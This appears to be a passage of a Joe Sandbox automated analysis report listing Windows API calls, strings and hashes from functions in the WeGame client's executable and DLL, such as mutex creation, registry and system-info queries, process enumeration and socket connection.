                                                                • Opcode ID: 0a67897ed0fdee7b608782a281cd17465900f3ba88a00f9d71ac72b259ee48e5
                                                                • Instruction ID: 3f81d7cd53416b3a20ae491d61d5f91879c9ce4d5abbbb74d4dc93be26062c06
                                                                • Opcode Fuzzy Hash: 0a67897ed0fdee7b608782a281cd17465900f3ba88a00f9d71ac72b259ee48e5
                                                                • Instruction Fuzzy Hash: 50119D71C01248AADF01DFF0C9427EDBBB06F10328F204169D5116A2C2DB7C5B4AEB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD2589C
                                                                • memset.VCRUNTIME140(?,00000000,00000104,00000120,6BD25A67,?,?,00000000,00000001), ref: 6BD258B5
                                                                • ?get_prefix@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?), ref: 6BD258CC
                                                                • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 6BD25910
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_prefix@util_multi_instance@ierd_tgp@@CreateD@2@@std@@D@std@@H_prolog3_MutexU?$char_traits@V?$allocator@V?$basic_string@memset
                                                                • String ID: %s%s
                                                                • API String ID: 4200199740-3252725368
                                                                • Opcode ID: fabefe5b77905ffa3d00af887102f1815a5c4780284cd24e1e59455c4dc88215
                                                                • Instruction ID: c854a40fa7573afc8f1810d605c2cc9f73fa72e899916d047ce847a63a804a05
                                                                • Opcode Fuzzy Hash: fabefe5b77905ffa3d00af887102f1815a5c4780284cd24e1e59455c4dc88215
                                                                • Instruction Fuzzy Hash: D601D4B2800208AFDB18DF74DD81DDA737CEF15328F1004A9A6559B191E7749F448B72
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020019,?), ref: 6BD8F987
                                                                • RegQueryValueExA.KERNEL32(?,~MHz,00000000,00000000,?,00000004), ref: 6BD8F9A4
                                                                • RegCloseKey.KERNEL32(?), ref: 6BD8F9AF
                                                                Strings
                                                                • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 6BD8F97A
                                                                • ~MHz, xrefs: 6BD8F99C
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz
                                                                • API String ID: 3677997916-2226868861
                                                                • Opcode ID: aa85950b4d3fc2e2616453b677b87fa126b7d94720801b63dfa37d323b5646dc
                                                                • Instruction ID: 045155e864b90c7e9b83296483039ac1b6d3ca541f59abda7d2c114cc6a758ab
                                                                • Opcode Fuzzy Hash: aa85950b4d3fc2e2616453b677b87fa126b7d94720801b63dfa37d323b5646dc
                                                                • Instruction Fuzzy Hash: 5DF04F76D01208FBDF10AF95D949E9FBFBCEB85714F10806AEA01E3125D7349609DB60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 6BDB2DC7
                                                                • GetProcAddress.KERNEL32(00000000), ref: 6BDB2DCE
                                                                • GetNativeSystemInfo.KERNEL32(?), ref: 6BDB2DE0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleInfoModuleNativeProcSystem
                                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                                • API String ID: 3469989633-192647395
                                                                • Opcode ID: a311ea9e1980a7b404ef5feb9822cd633cd1c917a39a6de6501c9415f1c507dd
                                                                • Instruction ID: 16ede194b168be27a08f4f7f1dcdecf43960d8ba6bf3e2380b622901b5509253
                                                                • Opcode Fuzzy Hash: a311ea9e1980a7b404ef5feb9822cd633cd1c917a39a6de6501c9415f1c507dd
                                                                • Instruction Fuzzy Hash: DBE0EC73F00204ABCE14B7AB8D089DF3BB8DB89764B500455E506BB040E67ADA8AD3F0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • memmove.VCRUNTIME140(00000000,7FFFFFFF,00000000,00000001,00000001,0000000F), ref: 0043B01A
                                                                • memset.VCRUNTIME140(00000010,00000001,00000001,00000000,7FFFFFFF,00000000,00000001,00000001,0000000F), ref: 0043B028
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001,00000001,0000000F), ref: 0043B06B
                                                                • memmove.VCRUNTIME140(00000000,?,00000000,00000001,00000001,0000000F), ref: 0043B073
                                                                • memset.VCRUNTIME140(7FFFFFFF,00000001,00000001,00000000,?,00000000,00000001,00000001,0000000F), ref: 0043B07F
                                                                  • Part of subcall function 0046E3BC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0040CD71,7FFFFFFE,?), ref: 0046E3D1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memmovememset$_invalid_parameter_noinfo_noreturnmalloc
                                                                • String ID:
                                                                • API String ID: 3042321802-0
                                                                • Opcode ID: 14007b52be7b924d1c8ec143cee0fc2f6b83e11c323f2da67bd97f56d23c199b
                                                                • Instruction ID: 40fe008a575036e968cc8bb14f2953c503ab92dc483c717cde0f4becbe2c97f8
                                                                • Opcode Fuzzy Hash: 14007b52be7b924d1c8ec143cee0fc2f6b83e11c323f2da67bd97f56d23c199b
                                                                • Instruction Fuzzy Hash: 894114B2A001049FCB05EF28CC805AEB7A6EF89350F10426EF915DB341DB34DD6187DA
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD63DD8
                                                                • GetFileAttributesW.KERNEL32(?,00000024,6BD61BE2,00000000,00000000,?,?,?,?,6BD61BCA,00000000,00000000,?,?,?,?), ref: 6BD63DF4
                                                                • CreateFileW.KERNEL32(?,00000000,00000007,00000000,00000003,02000000,00000000,?,?,?,?,6BD61BCA,00000000,00000000), ref: 6BD63E54
                                                                  • Part of subcall function 6BD62728: CreateFileW.KERNEL32(00000000,00000008,00000007,00000000,00000003,02200000,00000000,1F5A0D44,?,00000000,00000000,6BF84385,000000FF,?,6BD63E89,?), ref: 6BD62774
                                                                  • Part of subcall function 6BD62728: DeviceIoControl.KERNEL32(00000000,000900A8,00000000,00000000,?,00004000,?,00000000), ref: 6BD627A6
                                                                  • Part of subcall function 6BD62728: CloseHandle.KERNEL32(00000000,?,6BD63E89,?,?,?,?,6BD61BCA,00000000,00000000,?,?,?,?,6C03BD18,?), ref: 6BD627D4
                                                                • CloseHandle.KERNEL32(000000FF,?,?,?,6BD61BCA,00000000,00000000,?,?,?,?,6C03BD18,?,?,?,?), ref: 6BD63EA7
                                                                • CloseHandle.KERNEL32(000000FF,?,?,?,6BD61BCA,00000000,00000000,?,?,?,?,6C03BD18,?,?,?,?), ref: 6BD63EB6
                                                                  • Part of subcall function 6BD62D1E: __EH_prolog3_GS.LIBCMT ref: 6BD62D25
                                                                  • Part of subcall function 6BD62D1E: ?extension@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,0000001C,6BD63ED8,?,00000000,?,?,?,6BD61BCA,00000000,00000000,?,?,?,?,6C03BD18), ref: 6BD62D42
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CloseFileHandle$CreateH_prolog3_$?extension@path@filesystem@ierd_tgp@@AttributesControlDeviceV123@
                                                                • String ID:
                                                                • API String ID: 3244417928-0
                                                                • Opcode ID: 7dcb15effb9d3fbb091d24ead9f845557c8ffb079a2e763b2958261d92fea563
                                                                • Instruction ID: 15e5b2b4392217cad26f97dbcc34abcdc389df2f85d3c9be8b60a4aa18c4c31e
                                                                • Opcode Fuzzy Hash: 7dcb15effb9d3fbb091d24ead9f845557c8ffb079a2e763b2958261d92fea563
                                                                • Instruction Fuzzy Hash: 4B319070914205EFDB24CF68DC46B9DB7B4EF05374F204219E865AB2D0E7389A05CB71
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • InterlockedCompareExchange.KERNEL32(6C09F010,000000FF,00000000), ref: 6BD85EE0
                                                                • memmove.VCRUNTIME140(?,6C09F000,00000010,?,6BD83D93,?,00000018,6BD83E28,?,00000010), ref: 6BD85F28
                                                                  • Part of subcall function 6BD85F39: __EH_prolog3_GS.LIBCMT ref: 6BD85F43
                                                                  • Part of subcall function 6BD85F39: memset.VCRUNTIME140(?,00000000,00000006,00000358,6BD85EF7,6C09F000,?,6BD83D93,?,00000018,6BD83E28,?,00000010), ref: 6BD85F5C
                                                                • memmove.VCRUNTIME140(?,6C09F000,00000010,6C09F000,?,6BD83D93,?,00000018,6BD83E28,?,00000010), ref: 6BD85EFD
                                                                • InterlockedExchange.KERNEL32(6C09F010,00000001), ref: 6BD85F08
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ExchangeInterlockedmemmove$CompareH_prolog3_memset
                                                                • String ID:
                                                                • API String ID: 3014269698-0
                                                                • Opcode ID: bf89c137e83d723edbeaa7434018ebc468af03960e692923146be2ec44fd6534
                                                                • Instruction ID: d34a4ddcf1db09643215fa20be1a5270e8ef226013c35945c38cb66c543dadb0
                                                                • Opcode Fuzzy Hash: bf89c137e83d723edbeaa7434018ebc468af03960e692923146be2ec44fd6534
                                                                • Instruction Fuzzy Hash: 15F05932794100B3E6202F259C0AF573E2DABC1B65F000421FA051E561DBA7D8A2E6A0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00469E02
                                                                  • Part of subcall function 00459C0D: __EH_prolog3.LIBCMT ref: 00459C14
                                                                  • Part of subcall function 0046C858: __EH_prolog3_GS.LIBCMT ref: 0046C85F
                                                                Strings
                                                                • No such node, xrefs: 00469E40
                                                                • class boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_string<cha, xrefs: 00469E6C
                                                                • e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp, xrefs: 00469E67
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_$H_prolog3
                                                                • String ID: No such node$class boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_string<cha$e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp
                                                                • API String ID: 3952504126-2268865274
                                                                • Opcode ID: 3fdd627a91be0f17f2dce43afd9fd71986a91349f195d1cd6b97fcc2005e8d1c
                                                                • Instruction ID: 06a616a78d9fc9ad670e7f341ce03bfede6bbac0949cea2da8f5897e8d36133b
                                                                • Opcode Fuzzy Hash: 3fdd627a91be0f17f2dce43afd9fd71986a91349f195d1cd6b97fcc2005e8d1c
                                                                • Instruction Fuzzy Hash: FA11E531A00218B7DB15FAA6D802EDE77A8AF50B14F54815FB504A7182DFB8AE0583DD
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 004611AF
                                                                  • Part of subcall function 0045DC75: __EH_prolog3_GS.LIBCMT ref: 0045DC7F
                                                                  • Part of subcall function 0045DC75: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0045DCF9
                                                                  • Part of subcall function 0045DC75: Process32First.KERNEL32(00000000,?), ref: 0045DD1B
                                                                  • Part of subcall function 0045DC75: memset.VCRUNTIME140(?,00000000,00000410), ref: 0045DD2F
                                                                  • Part of subcall function 0045DC75: OpenProcess.KERNEL32(00000411,00000000,?), ref: 0045DD52
                                                                  • Part of subcall function 0045DC75: GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 0045DD71
                                                                  • Part of subcall function 0045DC75: SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045DDA8
                                                                  • Part of subcall function 0045DC75: memset.VCRUNTIME140(?,00000000,00000208,?,?,?,?), ref: 0045DE0B
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000058,00460569), ref: 004611D1
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                Strings
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp, xrefs: 004611F5
                                                                • [main]assistant is running, exit, xrefs: 00461211
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_memset$?get_log_instance@base@@CreateFileFirstH_prolog3Logger@1@ModuleNameOpenProcessProcess32SimpleSnapshotString::operator=Toolhelp32
                                                                • String ID: [main]assistant is running, exit$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp
                                                                • API String ID: 1363618106-3725917969
                                                                • Opcode ID: c4e37a55e715fb37885c3abe7d9ce2f7d989899318352fd337fc01b6220b05cd
                                                                • Instruction ID: 40f0c79e1b7c64e562d594947099563c805c59f34e84ab2a9a8826cd70ba6b83
                                                                • Opcode Fuzzy Hash: c4e37a55e715fb37885c3abe7d9ce2f7d989899318352fd337fc01b6220b05cd
                                                                • Instruction Fuzzy Hash: 2C019E31D00308ABCB10EB91D856BAE73B4AF11719F20454BE4117B1D1EB6CA905CB4E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD474B4
                                                                  • Part of subcall function 6BD4511D: __EH_prolog3.LIBCMT ref: 6BD45124
                                                                  • Part of subcall function 6BD49842: __EH_prolog3_GS.LIBCMT ref: 6BD49849
                                                                Strings
                                                                • No such node, xrefs: 6BD474F2
                                                                • e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp, xrefs: 6BD47519
                                                                • class boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_string<cha, xrefs: 6BD4751E
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_$H_prolog3
                                                                • String ID: No such node$class boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_string<cha$e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp
                                                                • API String ID: 3952504126-2268865274
                                                                • Opcode ID: b65f9a0f305e278523847130f02e896607174fc4a110c07881af26fd3c6c4ea4
                                                                • Instruction ID: 0333a3e54596902325d15c3e41da0c0f1ef64e487f0d5ab2270026d2e69db409
                                                                • Opcode Fuzzy Hash: b65f9a0f305e278523847130f02e896607174fc4a110c07881af26fd3c6c4ea4
                                                                • Instruction Fuzzy Hash: A401D132821069EBCB19DBB4C906EEDBB346F20728F040158A101BB190DB3C9B09C7A5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD9AAA7
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000050), ref: 6BD9AAAE
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                Strings
                                                                • [Qos_http_handler] OnEnd., xrefs: 6BD9AAEE
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\qos_http_handler.cpp, xrefs: 6BD9AAD2
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@H_prolog3H_prolog3_Logger@1@
                                                                • String ID: [Qos_http_handler] OnEnd.$e:\dailybuild_dev\wegame_client\codes\common\src\qos_http_handler.cpp
                                                                • API String ID: 52498757-3997266839
                                                                • Opcode ID: f4415daa465c11b707ce23ce9fc61b8c1ac18678bb102c9355312c53ffbc29b1
                                                                • Instruction ID: 86ffa9f0139dba760e8f3a4e8865a996896a2bec66a56e7673bd9507f4352118
                                                                • Opcode Fuzzy Hash: f4415daa465c11b707ce23ce9fc61b8c1ac18678bb102c9355312c53ffbc29b1
                                                                • Instruction Fuzzy Hash: 42F04932A416119BCB19E7B0A8A2B7D73625F90728F204158D4212F2D4CF3E8B0696A1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 004614C4
                                                                • ?get_comp_mgr_instance@common@ierd_tgp@@YAAAVComponent_mgr@12@XZ.COMMON(0000001C,0045A0DB), ref: 004614C9
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                • ?load_config@Component_mgr@common@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?,Config\client_plugin_config.info,00000020,0000001C,0045A0DB), ref: 004614FD
                                                                Strings
                                                                • Config\client_plugin_config.info, xrefs: 004614DD
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_comp_mgr_instance@common@ierd_tgp@@?load_config@Component_mgr@12@Component_mgr@common@ierd_tgp@@D@2@@std@@@D@std@@H_prolog3_U?$char_traits@V?$allocator@V?$basic_string@memmove
                                                                • String ID: Config\client_plugin_config.info
                                                                • API String ID: 716744841-3669469243
                                                                • Opcode ID: d584337a5eeb5edf0f890407885af1bb3da80313ef95a3be47d4ad4aba83ef24
                                                                • Instruction ID: d99be5ce0ca6cc0a5a8cc9384ad13a67375958eec1134ffc584925a3ebd67a06
                                                                • Opcode Fuzzy Hash: d584337a5eeb5edf0f890407885af1bb3da80313ef95a3be47d4ad4aba83ef24
                                                                • Instruction Fuzzy Hash: EDF03771E402099FDB14EFE6C4926EDFEB0AF04364F64156FE11577182EA384B4487AA
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • connect.WS2_32(?,?,?), ref: 6BF6FFCC
                                                                • WSAGetLastError.WS2_32 ref: 6BF6FFDA
                                                                • select.WS2_32(?,00000000,?,00000001,00000000), ref: 6BF7006E
                                                                • __WSAFDIsSet.WS2_32(?,?), ref: 6BF70080
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastconnectselect
                                                                • String ID:
                                                                • API String ID: 824528150-0
                                                                • Opcode ID: b4a6bfd0da5fbeea6d30270a62fb131640a795db464e89337eda46db9088f1b7
                                                                • Instruction ID: 934b4cb60c9bfb8c4fad186a158e778431e18f8ad2c1d6b178eb187a1831289f
                                                                • Opcode Fuzzy Hash: b4a6bfd0da5fbeea6d30270a62fb131640a795db464e89337eda46db9088f1b7
                                                                • Instruction Fuzzy Hash: 4721D6736142445BD738EF38D855BEEB7E8AF89310F504A7FA059C61E0EBB8D5048792
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD9A6D1
                                                                • std::_Cnd_initX.LIBCPMT ref: 6BD9A6EC
                                                                  • Part of subcall function 6BD31899: _Mtx_lock.MSVCP140(00000000,?,?,6BD9B017,?,1F5A0D44,?,?,00000001,00000000,6BF8B63F,000000FF,?,6BD96570,00000001,6BD43A1D), ref: 6BD318A0
                                                                  • Part of subcall function 6BD31899: ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000,?,?,6BD9B017,?,1F5A0D44,?,?,00000001,00000000,6BF8B63F,000000FF,?,6BD96570,00000001,6BD43A1D), ref: 6BD318AD
                                                                • std::_Cnd_initX.LIBCPMT ref: 6BD9A700
                                                                  • Part of subcall function 6BD318B8: _Mtx_unlock.MSVCP140(?,?,?,6BD9B05C,?,?,?,00000002,00000000), ref: 6BD318BF
                                                                  • Part of subcall function 6BD318B8: ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000,?,?,6BD9B05C,?,?,?,00000002,00000000), ref: 6BD318CC
                                                                • std::_Cnd_initX.LIBCPMT ref: 6BD9A779
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Cnd_initstd::_$C_error@std@@Throw_$H_prolog3Mtx_lockMtx_unlock
                                                                • String ID:
                                                                • API String ID: 3974313008-0
                                                                • Opcode ID: f5d5eb99e8cf7c24033301babf093d5efa5fc957011aaf7b5242dc6efeb49420
                                                                • Instruction ID: fe2980e7296e8a1e2366912e5720ec76cbabfb5a795cc012e571b4120c9f727e
                                                                • Opcode Fuzzy Hash: f5d5eb99e8cf7c24033301babf093d5efa5fc957011aaf7b5242dc6efeb49420
                                                                • Instruction Fuzzy Hash: C7219F31905256DAEF05DBB894427EDBBB4AF05324F204158D515EF2C1CB7C4B04DB76
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 0044355E
                                                                • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000008,0044352D,?,?,?,00000008,00000004,0046A12F,?,00000020,00000040,00000001,?,85A35C35), ref: 0044357B
                                                                • ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(?,00000000,00000000,00000008,0044352D,?,?,?,00000008,00000004,0046A12F,?,00000020,00000040,00000001,?), ref: 00443593
                                                                • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,?,?,?,00000000,?,?,?,?,?,0047B8A9,000000FF), ref: 004435E6
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_istream@?setstate@?$basic_ios@D@std@@@1@_H_prolog3V?$basic_streambuf@
                                                                • String ID:
                                                                • API String ID: 3697353692-0
                                                                • Opcode ID: 1cba3a43b7cf6df5976d853b9c4ffba6c12c8f16bbc386da8ba154352ec62fee
                                                                • Instruction ID: 102615187c4410a349a553e7e2e822658e7fe3353ad1143197363b721627864b
                                                                • Opcode Fuzzy Hash: 1cba3a43b7cf6df5976d853b9c4ffba6c12c8f16bbc386da8ba154352ec62fee
                                                                • Instruction Fuzzy Hash: AA118F74600206EFDB04DF69C889AAEBBB5FF44304F10815EF8159B381DB74DA51CB59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD448CB
                                                                • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000008,6BD447F7,?,?,?,0000000F,00000004,6BD4A69E,?,00000020,00000040,00000001,?,?,?,?), ref: 6BD448E8
                                                                • ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(00000005,00000000,00000000,00000008,6BD447F7,?,?,?,0000000F,00000004,6BD4A69E,?,00000020,00000040,00000001,?), ref: 6BD44900
                                                                • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,00000008,?,?,00000000), ref: 6BD44953
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_istream@?setstate@?$basic_ios@D@std@@@1@_H_prolog3V?$basic_streambuf@
                                                                • String ID:
                                                                • API String ID: 3697353692-0
                                                                • Opcode ID: d0a5cb4a28130304764a6daf00a8e07480ea2b12361d69007438ab561fccf194
